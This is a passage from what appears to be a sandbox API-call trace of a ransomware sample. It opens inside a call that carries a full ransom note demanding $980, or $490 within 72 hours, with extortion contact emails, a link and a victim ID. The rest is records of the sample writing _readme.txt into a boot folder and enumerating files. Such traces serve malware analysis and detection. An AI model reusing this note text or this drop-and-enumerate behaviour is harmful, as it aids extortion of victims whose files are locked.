tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.568] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.568] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.569] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.569] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.569] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.569] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.569] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 